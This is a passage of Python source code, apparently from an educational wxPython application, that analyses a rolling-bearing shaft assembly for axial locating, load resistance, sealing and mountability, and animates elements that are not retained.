            ### If the element carries the axial load
            if (maillon.num is not None) and maillon.supporteEffortAxial(self.sens,pos):
                # Add the element ...
                self.ajouterMaillonElemEntre(pos,num)
                if pos.radiale == "Al":
                    return True
                else:
                    # Keep walking ...
                    if not self.maillonElemEntraines(mtg,pos.suivant("DansChaine",self.sens),num):
                        pass
                    # Second path, case 1: crossing the bearing inner ring
                    if pos.radiale == "Ar" and pos.typelem == "A":
                        numSuiv = self.nouveauParcours(num,pos)
                        # Add the skipped bearing ...
                        self.ajouterMaillonElemEntre(pos.suivant("RoultSaute",self.sens),numSuiv)
                        if not self.maillonElemEntraines(mtg,pos.suivant("SauteRoult",self.sens),numSuiv):
                            return False
            ### If the element does NOT carry the load
            else:
                # Add the last link ...
                if maillon.num is not None:
                    self.ajouterMaillonElemEntre(pos,num)
                # Second path, case 2: jump to the next bearing seat
                # ("or" here: the two clauses are mutually exclusive, so an
                # "and" of both could never hold)
                if (self.sens == 0 and pos.palier == "G") \
                or (self.sens == 1 and pos.palier == "D"):
                    self.parcoursElemEntr.append([])
                    numSuiv = len(self.parcoursElemEntr)-1
                    if not self.maillonElemEntraines(mtg,pos.suivant("SautePalier",self.sens),numSuiv):
                        return False
return True
#############################################################################
def determinerLignes(self, mtg, zoneMtg, sens):
""" Rempli une liste de points <self.lstLignes>
pour le tracé des chaines d'action.
"""
def ajouterPoints(x , y, ligne, sgnSens, ecartement = 5):
"""Ajoute 2 points autour de la position <x,y> """
ligne.append(wx.Point(x - sgnSens*ecartement,
zoneMtg.milieuY + y + sgnSens))
ligne.append(wx.Point(x + sgnSens*ecartement,
zoneMtg.milieuY + y + sgnSens))
sgnsens = -sens * 2 + 1
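        # sgnsens maps the direction index to a sign: sens 0 -> +1, sens 1 -> -1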
        # Prepare the paths:
        #--------------------------
lstParcours = []
for nParcours in self.valid:
            # New path
parcours = []
lstParcours.append(parcours)
# print "Parcours ",nParcours,":",self.parcoursElemEntr[nParcours]
for i in range(len(self.parcoursElemEntr[nParcours])):
posParcours = self.parcoursElemEntr[nParcours][i]
                # Arrest elements ...
                if posParcours.typelem == "A" :
                    elemEntret = mtg.elemPos(posParcours).estEntretoise()
                    elemOppEntret = mtg.elemPos(posParcours.opposee()).estEntretoise()
                    # Spacers
                    if elemEntret or elemOppEntret: # there is a spacer ...
                        if elemEntret: # ... and it is load-bearing ...
                            pos = posParcours.copie()
                            pos.palier = None
                            pos.cotelem = None
                            parcours.append(pos)
                        else: # ... and it is not load-bearing ...
                            parcours.append(posParcours)
                    else: # no spacer at all ...
                        parcours.append(posParcours)
                # Bearings
                elif posParcours.typelem == "R":
                    # Keep the bearing only if it is crossed radially ...
                    if (self.parcoursElemEntr[nParcours][i-1].radiale \
                        != self.parcoursElemEntr[nParcours][i+1].radiale):
                        parcours.append(posParcours)
# print " Parcours modifié :",parcours
        # Build the polylines:
        #-------------------------
        lstLignes = []
        for parcours in lstParcours:
            # New polyline
            ligne = []
            lstLignes.append(ligne)
            # Start points
            ajouterPoints(zoneMtg.milieuX - sgnsens * (zoneMtg.milieuX - 40) ,
                          0 ,
                          ligne, sgnsens, ecartement = 20)
            # Element edges #############################
            for posParcours in parcours:
                # Align in Y with the first edge
                if len(ligne) == 2:
x , y = zoneMtg.coordsBordElem(mtg, posParcours)
ajouterPoints(x - sgnsens*40, 0, ligne, sgnsens,
ecartement = 20)
                # Spacers
                if posParcours.palier is None:
pos = posParcours.copie()
cotesEntretoise = [{'p' : "G", 'c' : "D"},
{'p' : "D", 'c' : "G"}]
if sens == 1:
cotesEntretoise.reverse()
for d in cotesEntretoise:
pos.palier = d['p']
pos.cotelem = d['c']
x , y = zoneMtg.coordsBordElem(mtg, pos, entretoise = True)
ajouterPoints(x , y , ligne, sgnsens)
else:
x , y = zoneMtg.coordsBordElem(mtg, posParcours)
ajouterPoints(x , y , ligne, sgnsens)
            # End points
ajouterPoints(x + sgnsens*40, -200, ligne, sgnsens,
ecartement = 20)
ajouterPoints(zoneMtg.milieuX + sgnsens * (zoneMtg.milieuX - 40) ,
-200,
ligne, sgnsens, ecartement = 20)
self.lstLignes = lstLignes
##############################################################################
##############################################################################
# #
# Analyse #
# #
##############################################################################
##############################################################################
class Analyse:
def __init__(self):
        # Options:
        #  ... ignore the press fits of the bearings when dismounting
        self.demonterRltSerres = False
        # State of the analysis
        self.estPerimee = True
        # By default: no bearings
        self.montageVide = True
        # Tags of the dismounted elements
        self.elemDemonte = []
        # Flag set while an animation is running
        self.animEnCours = False
        self.mobileTrace = None
        self.lstItemAles, self.lstItemArbre = [], []
        # Action chains to draw during a full redraw ("DessineTout")
        self.chaineTracee = {0 : None,
                             1 : None}
        self.obstacleTrace = None
##########################################################################
def lancerAnalyse(self, mtgComplet, zoneMtg):
""" Lance la procédure d'analyse du montage
"""
#
# print "Début analyse ..."
# print mtgComplet.mtg
tm = time.clock()
self.cdcf = mtgComplet.CdCF
self.mtg = mtgComplet.mtg
# Toutes les analyses ...
#-------------------------
# Remarques diverses....
self.analyserRemarques()
# Immobilisation axiale
self.analyserImmobilisationAxiale(zoneMtg)
# Structure ....
self.analyserStructure()
# Résistance aux charges ( dans cet ordre !! )
self.analyserResistanceRlt()
self.analyserResistanceAxialeMtg()
# Montabilité
self.analyserMontabilite(self.demonterRltSerres, zoneMtg)
if self.mtg.palier["G"].rlt.num is not None \
or self.mtg.palier["D"].rlt.num is not None:
self.montageVide = False
else:
self.montageVide = True
# Etanchéité
self.analyserEtancheite()
self.estPerimee = False
# print "Fin analyse", time.clock()- tm
##########################################################################
    #                Analysis: structure of the assembly                     #
##########################################################################
def analyserStructure(self):
""" Analyser la structure du montage :
--> ddl supprimés
--> Schéma de strucure
"""
def definirddlSupprimes(palier):
""" Détermination des ddl supprimés par le <palier>
0 : aucuns
1 : x+
2 : x-
4 : y
8 : n (rotation /z)
"""
# print "Définition des ddl, palier",palier
d = 0
            if self.mtg.palier[palier].rlt.num is None:
return d
for sens in [0,1]:
for parcoursvalid in self.chaineAct[sens].valid :
parcours = self.chaineAct[sens].parcoursElemEntr[parcoursvalid]
# print " ", sens, parcours
for n in range(len(parcours)-2):
pos = parcours[1:-1][n]
av = parcours[:-2][n]
ap = parcours[2:][n]
# for [av, pos, ap] in [parcours[:-2], parcours[1:-1], parcours[2:]]:
# print av, pos, ap,
if pos.typelem == "R" and pos.palier == palier and av.radiale <> ap.radiale:
d = d|(2**sens)
# print ddlSupprimes[cote]
if not self.mtg.elemPos(pos).estButee() and not self.mtg.elemPos(pos).estButeeDbl():
# print palier,"pas butée_"
d = d|4
if not self.mtg.palier[palier].rlt.estButee() and not self.mtg.palier[palier].rlt.estButeeDbl():
# print cote,"pas butée"
d = d|4
if self.mtg.palier[palier].rlt.num == 10 or self.mtg.palier[palier].rlt.num == 11:
# print cote,"pas butée"
d = d|8
# print " ddl suppr :",d
return d
self.ddlSupprimes = {}
for i in ["G","D"]:
self.ddlSupprimes[i] = definirddlSupprimes(i)
self.schemaStructure = SchemaStructure()
self.schemaStructure.determiner(self.mtg, self.ddlSupprimes)
        # Bitmap of the structure diagram
        #------------------------------
self.imageSchema = self.schemaStructure.bitmap()
##########################################################################
    #                Analysis: general remarks                               #
##########################################################################
def analyserRemarques(self):
""" Analyser si les regles de montage axial des roulements est respectée
"""
# Résultats
self.resultatRemarques = []
        # Check that there are two bearings ###############################################
if self.mtg.deuxrlt() == 0:
self.resultatRemarques.append(Const.MessageAnalyse('ManqueRlt'))
return
        # Check that the two bearings are compatible ##############################
if self.mtg.palier["G"].rlt.estOblique() or self.mtg.palier["D"].rlt.estOblique():
if (not self.mtg.palier["D"].rlt.estOblique()) or (not self.mtg.palier["G"].rlt.estOblique()):
self.resultatRemarques.append(Const.MessageAnalyse('RltsImcomp'))
else:
if self.mtg.palier["G"].rlt.orientation == self.mtg.palier["D"].rlt.orientation:
self.resultatRemarques.append(Const.MessageAnalyse('OrientIncorr'))
        # Check that separable-ring bearings are axially held #####################
clefResultRem = ""
for i in ["G","D"]:
if self.mtg.palier[i].rlt.estSeparable() \
and not self.mtg.palier[i].rlt.estOblique():
if not self.mtg.palier[i].arr['Ar']['G'].estDefini() \
or not self.mtg.palier[i].arr['Ar']['D'].estDefini() \
or not self.mtg.palier[i].arr['Al']['G'].estDefini() \
or not self.mtg.palier[i].arr['Al']['D'].estDefini():
clefResultRem += i
        if clefResultRem != "":
            self.resultatRemarques.append(Const.MessageAnalyse('RltPasMaintenu',[clefResultRem]))
        # Check that the bearings are arrested on the "rotating" ring ################
clefResultRem = ""
for i in ["G","D"]:
if self.cdcf.bagueTournante == "I":
codBag = "Ar"
if not self.mtg.palier[i].rlt.estOblique() \
and (not self.mtg.palier[i].arr['Ar']['G'].estDefini() \
or not self.mtg.palier[i].arr['Ar']['D'].estDefini()):
clefResultRem += i
else:
codBag = "Al"
if not self.mtg.palier[i].rlt.estOblique() \
and (not self.mtg.palier[i].arr['Al']['G'].estDefini() \
or not self.mtg.palier[i].arr['Al']['D'].estDefini()):
clefResultRem += i
        if clefResultRem != "":
self.resultatRemarques.append(Const.MessageAnalyse('RltPasArrete', (clefResultRem, codBag)))
##########################################################################
    #            Analysis: axial locating of the assembly                    #
##########################################################################
def analyserImmobilisationAxiale(self, zoneMtg):
""" Analyse de l'immobilisation axiale du montage
==> résultats dans des chaines d'action
"""
        # Axial locating of the assembly ...
        #-------------------------------------
        # --> results: one per direction ...
        self.resultatImmobilisation = [[],[]]
        # --> action chains: one per direction ...
        self.chaineAct = [ChainesAction(0), \
                          ChainesAction(1)]
        # --> list of the elements that are not arrested: one per direction ...
        self.listeElementsNonArretes = [[],[]]
        # --> bitmap of the structure diagram
        self.imageSchema = None
        # --> main message
        self.messageImmobilisation = None
# print self.chaineAct[0]
def listeElementsNonArretes(sens):
""" Renvoie la liste des éléments non arrêtés dans le sens <sens>
"""
lst = []
if sens == 0:
sensstr = "D"
else:
sensstr = "G"
# S'il existe un parcours valide ... on sort
if len(self.chaineAct[sens].valid) > 0:
return lst
# On passe par tous les parcousrs
for i in range(len(self.chaineAct[sens].parcoursElemEntr)):
# print " Parcours",i,":",self.chaineAct[sens].parcoursElemEntr[i]
# Parcours du parcours i
for po in self.chaineAct[sens].parcoursElemEntr[i]:
# Cas des roulements
if po.typelem == "R":
radialePreced = lst[len(lst)-1][3:]
# On ajoute les 2 bagues du roulement poussé
# print po, radialePreced, self.mtg.elemPos(po).supporteEffortAxial(sens)
if (radialePreced == "Ar" \
and self.mtg.elemPos(po).supporteEffortAxial(sens)) \
or (radialePreced == "Al" \
and self.mtg.elemPos(po).supporteEffortAxial(not sens)) \
or (self.mtg.elemPos(po).supporteEffortAxial(not sens) \
and self.mtg.elemPos(po).supporteEffortAxial(sens)):
lst.append(po.code()[0:3]+'--')
# print po.code()[0:3]+'--'
# On ajoute la bague du roulement poussée
else:
po.palier = lst[len(lst)-1][1]
lst.append(po.code(radialePreced))
## if radialePreced == "Ar":
## lst.append("BI" + lst[len(lst)-1][1] + sensstr)
## else:
## lst.append("BE" + lst[len(lst)-1][1] + sensstr)
# Cas des arrets
else:
lst.append(po.code())
# Cas des entretoises
if self.mtg.elemPos(po).estEntretoise():
## print "Entretoise"
lst.append(po.opposee().code())
# On ajoute les arrets fixés à l'arbre
for p in [Montage.PositionDansPivot("G","A","G","Ar"),
Montage.PositionDansPivot("G","A","D","Ar"),
Montage.PositionDansPivot("D","A","G","Ar"),
Montage.PositionDansPivot("D","A","D","Ar")]:
## print self.elemPos(p).codeTag(p)
el = self.mtg.elemPos(p)
if el is not None \
and el.supporteEffortAxial() \
and not el.estEpaulement():
## lst.append(mtg.elemPos(p).codeTag(p))
lst.append(p.code())
# Ajout bague intérieure si entrainée
# if p.cotelem <> sensstr:
# lst.append("BI"+p.palier+sensstr)
# Nettoyage de la liste
lst2 = []
for i in range(len(lst)):
if not lst[i] in lst2:
lst2.append(lst[i])
## print " Liste des éléments non arrétés :",lst2
return lst2
for s in [0,1]:
            # Analysis:
            self.chaineAct[s].determiner(self.mtg, zoneMtg)
            self.listeElementsNonArretes[s] = listeElementsNonArretes(s)
#            print self.listeElementsNonArretes[s]
            # Results:
            # Shaft not arrested!
            if len(self.chaineAct[s].valid) == 0:
                self.resultatImmobilisation[s].append(Const.MessageAnalyse('ArretArbreSens', [s]))
            # Shaft arrested!
            else:
                self.resultatImmobilisation[s].append(Const.MessageAnalyse('ImmobCorrect'))
                # hyperstatic!
                if len(self.chaineAct[s].valid) > 1:
                    self.resultatImmobilisation[s].append(Const.MessageAnalyse('Hyperstatique'))
        # Main message
        #-------------------
if self.resultatImmobilisation[0][0].clef == 'ImmobCorrect' \
and self.resultatImmobilisation[1][0].clef == 'ImmobCorrect':
self.messageImmobilisation = Const.MessageAnalyse('ArbreArrete')
else:
self.messageImmobilisation = Const.MessageAnalyse('ArbrePasArrete')
##########################################################################
    #          Analysis: axial load resistance of the assembly               #
##########################################################################
def analyserResistanceAxialeMtg(self):
""" Analyse la résistance axiale du montage complet
"""
#############################################################################
def nomsElem(sens):
lst = []
pos = Montage.PositionDansPivot()
for res in self.lstElemResistePas[sens]:
lst.append(Const.MessageAnalyse(mess = pos.traduireEnTexte(res), coul = "rouge"))
return lst
        # Axial resistance of the assembly ...
        # --> results:
        self.resultatEffortAxialMtg = [[],[]]
        # --> elements that do not resist: per direction ...
        self.lstElemResistePas = [[],[]]
        # --> bitmap of the structure diagram (with loads)
        self.imageSchemaCharges = None
        # --> main message
        self.messageResistanceAxiale = None
lstElemResistePas = [[],[]]
for sens in [0,1]:
## print "sens", sens
chaine = self.chaineAct[sens]
for nParcours in chaine.valid:
## print chaine.parcoursElemEntr[nParcours]
for n in range(len(chaine.parcoursElemEntr[nParcours])):
posParcours = chaine.parcoursElemEntr[nParcours][n]
elem = self.mtg.elemPos(posParcours)
## print n
                    if (elem.num is not None) and not (posParcours.typelem == "R" and \
                        chaine.parcoursElemEntr[nParcours][n-1].radiale == chaine.parcoursElemEntr[nParcours][n+1].radiale):
                        if elem.effortAxialSupporte() < self.cdcf.effortAxial[sens].val:
                            if posParcours.typelem != "R" \
                            or self.resultatResistanceRlt[posParcours.palier].clef == 'RltSupportePas':
                                lstElemResistePas[sens].append(posParcours.code())
            # Drop duplicates and "merge" the bearing rings
for e in lstElemResistePas[sens]:
if e[0] == "R":
e = e[0:2]+"---"
if not e in self.lstElemResistePas[sens]:
self.lstElemResistePas[sens].append(e)
            if lstElemResistePas[sens] != []:
self.resultatEffortAxialMtg[sens].append(Const.MessageAnalyse('ElemResistPas'))
self.resultatEffortAxialMtg[sens].extend(nomsElem(sens))
else:
if chaine.valid == []:
self.resultatEffortAxialMtg[sens].append(Const.MessageAnalyse('ArretArbreSens', [sens]))
else:
self.resultatEffortAxialMtg[sens].append(Const.MessageAnalyse('ChargeAxOk'))
        # Main message
        #-------------------
if self.resultatEffortAxialMtg[0][0].clef == 'ChargeAxOk' \
and self.resultatEffortAxialMtg[1][0].clef == 'ChargeAxOk':
self.messageResistanceAxiale = Const.MessageAnalyse('ChargeAxOk')
else:
self.messageResistanceAxiale = Const.MessageAnalyse('ChargeAxNo')
        # Bitmap of the structure diagram (with loads)
        #------------------------------
def charge(cote):
return [self.typeCharge[cote],
self.typeCharge[cote] == 0 \
or self.resultatResistanceRlt[cote] == None \
or self.resultatResistanceRlt[cote].clef == 'RltSupporte']
charges = {"G" : charge("G"),
"D" : charge("D")}
self.imageSchemaCharges = self.schemaStructure.bitmap(charges)
##########################################################################
    #          Analysis: load resistance of the bearings                     #
##########################################################################
def analyserResistanceRlt(self):
""" Analyse la résistance aux charges des roulements
* Type de charge subie par un roulement :
0 : aucune
1 : x+
2 : x-
4 : y
*
"""
        # Bearing resistance ...
        # --> results: one per bearing seat ...
        self.resultatResistanceRlt = {"G" : None,
                                      "D" : None}
        # --> one load type per bearing seat ...
        self.typeCharge = {"G" : 0,
                           "D" : 0}
        def definirTypeChargeCdCF(palier):
            """ Load type that <palier> must carry according to the CdCF
            """
            t = 0
            if self.cdcf.effortRadial[palier].get() != 0:
                t += 4
            for sens in [0,1]:
                if self.cdcf.effortAxial[sens].get() != 0:
                    t = t|(1+sens)
            return t
        # Analyze each bearing ...
        for i in ["G","D"]:
            # Load type actually carried by the seat
            typeChargeCdCF = definirTypeChargeCdCF(i)
            self.typeCharge[i] = (self.ddlSupprimes[i]|4) & typeChargeCdCF
            rlt = self.mtg.palier[i].rlt
            # Intensity of the axial load (if there is one ...)
            chargeAxiale = 0
            ls = []
            if self.typeCharge[i]&1 :
                ls.append(0)
            if self.typeCharge[i]&2:
                ls.append(1)
            for sens in ls:
                chargeAxiale = max(chargeAxiale, self.cdcf.effortAxial[sens].get())
            # Intensity of the radial load (if there is one ...)
            chargeRadiale = self.cdcf.effortRadial[i].get()
            # Check whether the bearing resists ...
            if rlt.num is not None:
                if self.typeCharge[i]&4:
                    typeCharge = "radial"
                    intensite = chargeRadiale
                if self.typeCharge[i]&3:
                    typeCharge = "axial"
                    intensite = chargeAxiale
                if self.typeCharge[i]&3 and self.typeCharge[i]&4:
                    typeCharge = "combi"
                    intensite = max(chargeRadiale,chargeAxiale)
                if self.typeCharge[i] == 0:
                    typeCharge = ""
                    intensite = 0
                if typeCharge != "" and rlt.coefTaille(rlt.chargeAdm[typeCharge]) < intensite:
                    self.resultatResistanceRlt[i] = Const.MessageAnalyse('RltSupportePas')
                else:
                    self.resultatResistanceRlt[i] = Const.MessageAnalyse('RltSupporte')
        # Main message
supp = []
for p in ["G","D"]:
if self.resultatResistanceRlt[p] is not None \
and self.resultatResistanceRlt[p].clef == 'RltSupportePas':
supp.append(p)
if len(supp) == 2:
self.messageResistanceRlt = Const.MessageAnalyse('TRltSupportePas')
elif len(supp) == 1:
self.messageResistanceRlt = Const.MessageAnalyse('1RltSupportePas', supp[0])
else:
self.messageResistanceRlt = Const.MessageAnalyse('TRltSupporte')
# print "Charges CdCF :", self.typeCharge
##########################################################################
    #                Analysis: sealing                                       #
##########################################################################
def analyserEtancheite(self):
""" Analyse l'étanchéité du montage
"""
# print "Analyse etancheite"
#
# Etanchéité du montage
#
# --> Résultats :
self.resultatEtancheite = {"M" : None,
"G" : {'vitt' : None,
'pres' : None},
"D" : {'vitt' : None,
'pres' : None}}
pasEtanchStat = {"G" : {"Ar" : False, #
"Al" : False}, # Localisation
"D" : {"Ar" : False, # du défaut
"Al" : False}, #
"B" : []} #
pasEtanchDyn = {"G" : {"P" : False,
"PV" : False},
"D" : {"P" : False,
"PV" : False},
"B" : []}
pasDeJoint = {"G" : {"Ar" : False,
"Al" : False},
"D" : {"Ar" : False,
"Al" : False},
"B" : False}
for p in ["G","D"]:
            # Static sealing
            #--------------------
            for r in ["Ar","Al"]:
                if self.mtg.palier[p].jnt[r].num is None:
pasDeJoint[p][r] = True
if r == "Ar":
pasDeJoint["B"] = True
pasEtanchStat["B"].append('ManqueJoint'+p)
pressAdm = -1
else:
if self.mtg.palier[p].jnt["Ar"].num is None:
pressAdm = -1
else:
pressAdm = self.cdcf.pressionAdmChapeau
else:
pressAdm = self.mtg.palier[p].jnt[r].pressAdm[r]
# print "Pr",self.cdcf.pression.get(), "PrAdm",pressAdm
if pressAdm < self.cdcf.pression.get():
# print "pas étanche !", pressAdm, "<", self.cdcf.pression.get()
pasEtanchStat[p][r] = True
if not ('PressTrop'+p in pasEtanchStat["B"]):
pasEtanchStat["B"].append('PressTrop'+p)
            # Dynamic sealing
            #---------------------
            # Compute the PV factor
if self.mtg.palier[p].taille == "P" :
coefVitt = 1
else:
coefVitt = 1.5
facteurPV = self.cdcf.pression.get()*self.cdcf.vitesse.get()*coefVitt/ \
(self.cdcf.echellePression*self.cdcf.echelleVitesse*coefVitt) \
*10
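            # NB: coefVitt appears in both the numerator and the denominator
            # above, so as written it cancels out of facteurPV.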
            # Speed admissible for the seal
            if self.mtg.palier[p].jnt["Ar"].num is None:
                vittAdm = 10
                facteurPVAdm = -1
            else:
                vittAdm = self.mtg.palier[p].jnt["Ar"].vittAdm
                facteurPVAdm = self.mtg.palier[p].jnt["Ar"].facteurPV
            # Speed test
            if vittAdm < self.cdcf.vitesse.get():
                pasEtanchDyn[p]["P"] = True
                pasEtanchDyn["B"].append('VitesseTrop'+p)
            # PV-factor test
            if facteurPVAdm < facteurPV:
                pasEtanchDyn[p]["PV"] = True
                pasEtanchDyn["B"].append('FactPVTrop'+p)
#
        # Lubricant compatibility
        #
        compatible = True
        if self.cdcf.lubrifiant.get() == 0 :
            for p in ["G","D"]:
                if self.mtg.palier[p].jnt["Ar"].num == 203:
                    compatible = False
                    break
#
        # Summary
        #-------
self.resultatEtancheite["S"] = pasEtanchStat
self.resultatEtancheite["J"] = pasDeJoint
if compatible:
self.resultatEtancheite["C"] = Const.MessageAnalyse('LubrifComp')
else:
self.resultatEtancheite["C"] = Const.MessageAnalyse('LubrifPasComp')
if pasEtanchStat["B"] <> []:
self.resultatEtancheite["SB"] = Const.MessageAnalyse('PasEtanchStat')
self.resultatEtancheite["SB+"] = []
for m in pasEtanchStat["B"]:
self.resultatEtancheite["SB+"].append(Const.MessageAnalyse(m[:-1],m[-1:]))
else:
self.resultatEtancheite["SB"] = Const.MessageAnalyse('EtanchStat')
self.resultatEtancheite["D"] = pasEtanchDyn
if pasEtanchDyn["B"] <> []:
self.resultatEtancheite["DB"] = Const.MessageAnalyse('PasEtanchDyn')
self.resultatEtancheite["DB+"] = []
for m in pasEtanchDyn["B"]:
self.resultatEtancheite["DB+"].append(Const.MessageAnalyse(m[:-1],m[-1:]))
else:
self.resultatEtancheite["DB"] = Const.MessageAnalyse('EtanchDyn')
###########################################################################
def montrerCollision(self, zoneMtg, lstCode, palier = None,
active = True, deuxCouleurs = True):
""" Met en évidence les obstacles au démontage """
# print "Montrer collision :",lstCode,
obstaclesRoulements = len(lstCode) == 1
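        # A single code appears to mean a bearing-ring obstacle; the bearing
        # itself is appended below (reading inferred from this method's code).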
if (self.cdcf.bagueTournante == "I" and not obstaclesRoulements) \
or (self.cdcf.bagueTournante == "E" and obstaclesRoulements):
rad = "Al"
else:
rad = "Ar"
        #
        # Add the bearing itself for bearing-ring obstacles
        if obstaclesRoulements:
            lstCode = [lstCode[0], "R"+palier+"---"]
        # Positions for the arrow
lstPos = []
        # Display colors
if deuxCouleurs:
coul = "rouge"
else:
coul = "noir"
lstCodeCoul = [[lstCode[0],"noir"],
[lstCode[1],coul]]
for pcode in lstCodeCoul:
elemClef = self.mtg.clefElemPosCode(pcode[0])
elem = elemClef[0]
lstClef = elemClef[1]
lstPos.append(Montage.PositionDansPivot().posCode(pcode[0]))
# for clef in lstClef:
# if active:
# elem.item[clef].couleur(pcode[1])
# else:
# elem.item[clef].normale()
# print lstPos
if active:
self.obstacleTrace = (lstPos,rad)
else:
self.obstacleTrace = None
zoneMtg.Redessiner(self)
##########################################################################
def animerManqueArret(self, zoneMtg, sens, position = None):
"Animation des éléments non arrêtés axialement"
# print "Animation des éléments non arrêtés axialement"
# print "listeElementsNonArretes",self.listeElementsNonArretes[sens]
wx.BeginBusyCursor()
lstItemAnim = []
        # sign of the displacement direction ########################
sgn = 1 - sens*2
        # Prepare the non-retained elements ########################
        for i in zoneMtg.lstItemMtg: # walk every displayed item
            # include all shaft elements
if TAG_ARBRE in i.tag:
lstItemAnim.append(i)
continue
            # include the listed elements (excluding housing elements)
else:
# print i.tag,
for t in self.listeElementsNonArretes[sens]:
if t in i.tag and not TAG_ALESAGE in i.tag:
lstItemAnim.append(i)
continue
s = set(lstItemAnim)
lstItemAnim = list(s)
# print "lstItemAnim",lstItemAnim
        # Start the animation
        #====================
        # Duration (seconds) & amplitude (pixels)
duree, amplitude = 2, 4
        # Number of frames
nbPos = duree * 25
        # Compute the step
s = 0
for n in range(nbPos):
s += sin((1.0*n)/nbPos*pi)
# pas = 2 * amplitude/s
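        # ('s' above is only needed by the commented-out step computation)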
# def GroupeBmp(lstItem):
#            # Combine the images
# bmp = wx.EmptyBitmap(zoneMtg.maxWidth, zoneMtg.maxHeight)
# memdc = wx.MemoryDC(bmp)
# memdc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
# memdc.Clear()
# for i in lstItemAnim:
# memdc.DrawBitmap(i.bmp, i.pos[0], i.pos[1], True)
## zoneMtg.hachurer(memdc, self.listeElementsNonArretes[sens])
# memdc.SelectObject(wx.NullBitmap)
# img = wx.ImageFromBitmap(bmp)
# img.SetMaskColour(255,255,254)
# img.SetMask(True)
# bmp = wx.BitmapFromImage(img)
# return bmp
        # Save each item's x position
for i in lstItemAnim:
i.x = i.pos[0]
        if position is None:
            # Motion
oldx = 0
for c in range(nbPos):
tm = time.clock()
x = int(round(-amplitude*cos(pi*2*c/nbPos)+amplitude))
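                # smooth back-and-forth: x sweeps 0 -> 2*amplitude -> 0 over the cycle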
if x <> oldx:
for i in lstItemAnim:
i.pos = (i.x + sgn*x, i.pos[1])
oldx = x
zoneMtg.Redessiner()
dt = 0.05 - time.clock() + tm
if dt > 0:
time.sleep(dt)
else:
for i in lstItemAnim:
i.pos = (i.x + sgn*amplitude*2*position, i.pos[1])
wx.EndBusyCursor()
##########################################################################
    # Analysis : mountability                                               #
##########################################################################
def analyserMontabilite(self, demonterRltSerres, zoneMtg):
""" Analyse de la montabilité du montage
"""
self.demonterRltSerres = demonterRltSerres
        # Mountability of the assembly
        # --> Overall result:
self.resultatMontabilite = None
        # --> List of moving elements: one per direction ...
self.listeElemArbre = [[],[]]
        # --> List of fixed elements: one per direction ...
self.listeElemAlesage = [[],[]]
        # --> List of elements to remove for disassembly: one per direction ...
self.lstArretsAEnleverEns = [[],[]]
        # --> List of elements to remove for dismounting the bearings: one per direction and per bearing support ...
self.lstArretsAEnleverRlt = {"G" : [[],[]],
"D" : [[],[]]}
        # --> List of obstacles to mounting/dismounting the assembly: one per direction ...
self.obstacleEnsble = [[],[]]
        # --> List of obstacles to mounting/dismounting the bearings: one per direction and per bearing support ...
self.obstacleRoults = {"G" : [[],[]],
"D" : [[],[]]}
        # --> List of obstacles to mounting/dismounting the isolated rings: one per direction and per bearing support ...
self.obstacleBagueIsolee = {"G" : [[],[]],
"D" : [[],[]]}
        def bagueIndemontable(rad):
            if rad == "Ar":
                return self.cdcf.bagueTournante == "I" and not self.demonterRltSerres
            elif rad == "Al":
                return self.cdcf.bagueTournante == "E" and not self.demonterRltSerres
class groupeMontage():
def __init__(self):
self.lst = [[]] * 6
self.min = [1] * 6
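                # 'lst' holds six axial slices of element codes and 'min' the
                # minimum number of entries each slice must keep (inferred
                # from how agrandir/enlever use them below)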
def __repr__(self):
t = []
n = 1
for p in self.lst:
n = max(n,len(p))
c = ""
for m in self.min:
c += "\t "+str(m)
t.append(c+"\n")
for l in range(n):
c = ""
for p in self.lst:
try:
c += "\t"+p[l]
                    except IndexError:
c += "\t"
t.append(c+"\n")
if self.lst[0][0][4] == "r":
t.reverse()
texte = ''.join(t)
return texte
def agrandir(self, pos, groupeOppose):
tranche = self.lst[pos]
trancheOpp = groupeOppose.lst[pos]
if len(tranche) > self.min[pos]:
trancheOpp.append(tranche.pop())
return True
return False
def enlever(self, pos, mtg, lstArretsAEnleverEns):
tranche = self.lst[pos]
# print tranche[-1:][0]
if mtg.estEnlevable(tranche[-1:][0]):
lstArretsAEnleverEns.append(tranche.pop())
return True
return False
def listeElementsArbre(sens):
""" Renvoie la liste des éléments liés à l'arbre
sur leur logement dans le sens <sens>
PROVISOIRE !!
"""
# print "Etabli la listedes éléments liés à l'arbre"
# print ">>> Sens",sens
# print ">>> Démonter Rlts serrés :",self.demonterRltSerres
grp = groupeMontage()
            # The smallest possible list (seats only)
lst = [["-G-Ar"],
["-G-Ar"],
["-G-Ar"],
["-D-Ar"],
["-D-Ar"],
["-D-Ar"]]
            # Add the shaft stops
for pos in [0,2,3,5]:
p = lst[pos][0][1]
if pos == 0 or pos == 3:
c = "G"
else:
c = "D"
elem = self.mtg.palier[p].arr["Ar"][c]
if elem.num is not None:
if not elem.estEntretoise():
lst[pos].append("A"+p+c+"Ar")
            # Add the bearings (if press-fitted on the shaft)
for pos in [1,4]:
p = lst[pos][0][1]
elem = self.mtg.palier[p].rlt
if elem.num is not None:
if bagueIndemontable("Ar"):
if elem.estSeparableSens(not sens, "Ar"):
lst[pos].append("R"+p+"-Ar")
else:
lst[pos].append("R"+p+"---")
            # Reverse to match the disassembly direction
if sens == 1:
lst.reverse()
grp.lst = lst
            # Define the minimum "levels" ...
            for p in range(6):
                grp.min[p] = len(grp.lst[p])
return grp
def listeElementsAlesage(lstAr, sens):
""" Renvoie la liste des éléments "libres"
= complémentaire de <lMob> !
"""
def ccote(pos):
if (pos == 0 or pos == 3) and sens == 0 \
or (pos == 2 or pos == 5) and sens == 1:
return "G"
else:
return "D"
grp = groupeMontage()
            # The largest possible list
lst = [["-G-Al", "AGGAl", "AGGAr"],
["-G-Al", "RG---", "RG-Al", "RG-Ar"],
["-G-Al", "AGDAl", "ADGAl", "AGDAr", "ADGAr"],
["-D-Al", "ADGAl", "AGDAl", "ADGAr", "AGDAr"],
["-D-Al", "RD---", "RD-Al", "RD-Ar"],
["-D-Al", "ADDAl", "ADDAr"]]
            # Reverse to match the disassembly direction
if sens == 1:
lst.reverse()
            # Remove those already present in lstAr
for pos in range(6):
for p in lstAr[pos]:
if p in lst[pos]:
lst[pos].remove(p)
if p[0] == "R":
if p[4] == "-":
lst[pos].remove(p[0:3]+"Ar")
lst[pos].remove(p[0:3]+"Al")
else:
lst[pos].remove(p[0:3]+"--")
            # Remove the absent stops
for pos in [0,2,3,5]:
for p in lst[pos][1:]:
palier = p[1]
cote = p[2]
rad = p[-2:]
elem = self.mtg.palier[palier].arr[rad][cote]
if elem.num is None:
lst[pos].remove(p)
